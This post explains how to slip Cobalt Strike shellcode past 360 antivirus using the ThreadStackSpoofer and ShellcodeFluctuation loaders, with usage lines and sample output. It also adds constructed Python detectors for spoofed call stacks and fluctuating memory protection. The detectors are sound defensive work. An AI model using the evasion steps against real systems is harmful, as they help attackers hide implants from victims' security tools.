Cobalt Strike AV evasion against 360

0. Introduction

Generate raw-format shellcode in CS:

Attacks -> Packages -> Payload Generator, select a listener, and generate payload.bin

1. ThreadStackSpoofer loader

The ThreadStackSpoofer loader evades detection by spoofing the thread's call stack.

Tool: mgeeky/ThreadStackSpoofer

Usage: C:\> ThreadStackSpoofer.exe <shellcode> <spoof>
[.] Reading shellcode bytes...
[.] Hooking kernel32!Sleep...
[.] Injecting shellcode...
[+] Shellcode is now running.
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...

===> MySleep(5000)

[<] Restoring original return address...
[>] Original return address: 0x1926747bd51. Finishing call stack...
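The output above shows the loader overwriting the return address that points back into the shellcode, so a stack walk stops at the Sleep hook instead of reaching the thread-start frames. As an added defender-side example (not code from this post or from the ThreadStackSpoofer project), the check below takes an unwound call stack plus the process's module map and flags the two things that distinguish a beacon sleeping from private memory from a legitimate Sleep call: a return address no loaded module backs, and a stack that ends before kernel32/ntdll's thread-start frames. Module ranges, stack frames and helper names are constructed for illustration.

```python
"""Flag thread call stacks whose return addresses are unbacked or whose walk is truncated.

Added defender-side example. The module map and stacks are constructed sample data
in the shape an EDR or debugger stack walk produces; helper names are ours.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


# Constructed module map; addresses are invented, not taken from a real process.
MODULES = [
    Module("ntdll.dll", 0x7FFA_0000_0000, 0x200000),
    Module("kernel32.dll", 0x7FFA_1000_0000, 0x100000),
    Module("kernelbase.dll", 0x7FFA_2000_0000, 0x300000),
    Module("loader.exe", 0x7FF6_0000_0000, 0x40000),
]

# A normally created thread bottoms out in kernel32!BaseThreadInitThunk / ntdll!RtlUserThreadStart.
EXPECTED_BASE = ("kernel32.dll", "ntdll.dll")


def module_for(addr: int) -> Optional[Module]:
    """Return the module whose image range covers addr, or None for private memory."""
    for m in MODULES:
        if m.contains(addr):
            return m
    return None


def check_stack(frames: List[int]) -> Dict[str, object]:
    """Inspect one call stack (innermost frame first).

    unbacked:  return addresses in memory no module covers (shellcode in a private region);
    truncated: the walk did not end in the thread-start frames, which is what overwriting a
               return address with 0 produces: the walker stops at the hook frame.
    """
    unbacked = [hex(a) for a in frames if module_for(a) is None]
    last = module_for(frames[-1])
    truncated = last is None or last.name not in EXPECTED_BASE
    return {
        "unbacked": unbacked,
        "truncated": truncated,
        "suspicious": bool(unbacked) or truncated,
    }


# Constructed stacks (innermost first): NtDelayExecution, SleepEx, Sleep, caller, ..., thread start.
NORMAL_SLEEP = [0x7FFA_0000_1234, 0x7FFA_2000_5678, 0x7FFA_1000_9ABC,
                0x7FF6_0000_1000, 0x7FFA_1000_0100, 0x7FFA_0000_0200]
# Beacon calling Sleep from a private RX region: one frame that no module backs.
UNSPOOFED_SHELLCODE = [0x7FFA_0000_1234, 0x7FFA_2000_5678, 0x7FFA_1000_9ABC,
                       0x1926747BD51, 0x7FFA_1000_0100, 0x7FFA_0000_0200]
# Spoofed: the shellcode return address was replaced, so the walk ends at the MySleep frame.
SPOOFED = [0x7FFA_0000_1234, 0x7FFA_2000_5678, 0x7FFA_1000_9ABC, 0x7FF6_0000_1000]

if __name__ == "__main__":
    for label, stack in (("normal", NORMAL_SLEEP), ("unspoofed", UNSPOOFED_SHELLCODE), ("spoofed", SPOOFED)):
        print(label, check_stack(stack))
```

The spoofed stack passes the unbacked-address test that catches a plain shellcode sleep, which is why a call-stack rule also needs the truncation check: a Sleep whose stack never reaches the thread-start frames is itself the anomaly.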


2. ShellcodeFluctuation loader

The ShellcodeFluctuation loader evades detection by repeatedly encrypting and decrypting the shellcode's contents in memory while it sleeps.

Tool: mgeeky/ShellcodeFluctuation

Usage: C:\> ShellcodeFluctuation.exe <shellcode> <fluctuate>
<fluctuate>:
-1 - Read shellcode but dont inject it. Run in an infinite loop.
0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything
1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.
2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.
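Modes 1 and 2 above flip the shellcode region between an executable protection and PAGE_READWRITE or PAGE_NOACCESS around every sleep, so a memory scan at rest sees encrypted, non-executable bytes. The flipping itself is visible wherever protection changes are recorded. As an added defender-side example (not code from this post or from the ShellcodeFluctuation project), the function below takes VirtualProtect-style event records and reports regions whose protection toggles between executable and non-executable more than a threshold number of times. The event tuples, process ids and addresses are constructed; the field layout is ours, not any product's schema.

```python
"""Find memory regions whose protection keeps flipping executable <-> non-executable.

Added defender-side example. The event records are constructed to resemble what an API
hook, ETW consumer or sandbox trace would log for VirtualProtect; the tuple layout is ours.
"""
from collections import defaultdict
from typing import Dict, Iterable, Tuple

# Windows memory protection constants (base protection lives in the low byte).
PAGE_NOACCESS = 0x01
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

Event = Tuple[int, int, int, int]  # (time_ms, pid, region_base, new_protect)


def is_executable(protect: int) -> bool:
    """True if the protection grants execute; PAGE_GUARD/PAGE_NOCACHE modifiers are masked off."""
    return (protect & 0xFF) in EXECUTABLE


def find_fluctuating_regions(events: Iterable[Event], min_flips: int = 4) -> Dict[Tuple[int, int], int]:
    """Return {(pid, base): flip_count} for regions that crossed the executable /
    non-executable boundary at least min_flips times, in time order.

    A one-off RW -> RX transition (a JIT or a packer unpacking once) scores a single
    flip and stays below the threshold; periodic toggling around sleeps does not.
    """
    last_state: Dict[Tuple[int, int], bool] = {}
    flips: Dict[Tuple[int, int], int] = defaultdict(int)
    for _t, pid, base, prot in sorted(events):
        key = (pid, base)
        state = is_executable(prot)
        if key in last_state and last_state[key] != state:
            flips[key] += 1
        last_state[key] = state
    return {k: v for k, v in flips.items() if v >= min_flips}


# Constructed events: one JIT-like region that settles, one region fluctuating every ~5 s.
SAMPLE_EVENTS = [
    (0, 4242, 0x1F0000, PAGE_READWRITE),
    (5, 4242, 0x1F0000, PAGE_EXECUTE_READ),          # single RW -> RX transition
    (100, 1337, 0x2A0000, PAGE_EXECUTE_READWRITE),
    (5100, 1337, 0x2A0000, PAGE_READWRITE),          # sleep: contents encrypted, not executable
    (5105, 1337, 0x2A0000, PAGE_EXECUTE_READWRITE),  # wake: decrypted and executable again
    (10105, 1337, 0x2A0000, PAGE_NOACCESS),          # mode 2 style: no access while sleeping
    (10110, 1337, 0x2A0000, PAGE_EXECUTE_READWRITE),
    (15110, 1337, 0x2A0000, PAGE_READWRITE),
]

if __name__ == "__main__":
    for (pid, base), count in find_fluctuating_regions(SAMPLE_EVENTS).items():
        print(f"pid {pid} region {base:#x}: {count} executable/non-executable flips")
```

The threshold trades false positives against latency: a value of 4 needs two full sleep cycles before a region is reported, which a snapshot memory scanner, looking at the encrypted non-executable pages in between, never gets to see.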
